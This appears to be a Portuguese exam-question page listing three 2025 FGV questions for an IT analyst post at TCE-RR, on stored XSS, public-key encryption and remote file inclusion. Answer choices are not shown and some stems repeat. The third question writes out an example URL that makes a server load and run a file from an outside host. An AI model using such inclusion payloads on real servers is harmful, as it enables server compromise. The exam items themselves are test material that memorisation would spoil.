Questões de Concurso Público TCE-RR 2025 para Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas
Foram encontradas 3 questões
Ano: 2025
Banca:
FGV
Órgão:
TCE-RR
Prova:
FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas |
Q3174948
Segurança da Informação
Analistas do TCE-RR utilizavam uma plataforma web interna para
registrar auditorias. Durante a análise de segurança, foi detectado
que áreas de entrada de texto na plataforma, usadas para registrar
observações em relatórios, continham código malicioso
armazenado no servidor.
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
Ano: 2025
Banca:
FGV
Órgão:
TCE-RR
Prova:
FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas |
Q3174950
Segurança da Informação
Durante uma auditoria no setor de TI de TCE-RR, foi constatado
que os analistas estavam utilizando criptografia por chave pública
para o envio de informações confidenciais. Para garantir que os
dados sejam protegidos contra acessos não autorizados, cada
servidor precisa configurar corretamente as chaves de criptografia
antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Ano: 2025
Banca:
FGV
Órgão:
TCE-RR
Prova:
FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas |
Q3174951
Segurança da Informação
A página web da sociedade empresária Exemplo1234, disponível
na internet, permite que internautas acessem o edital de uma vaga
de trabalho por meio do endereço eletrônico
http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
Conheça nossos planos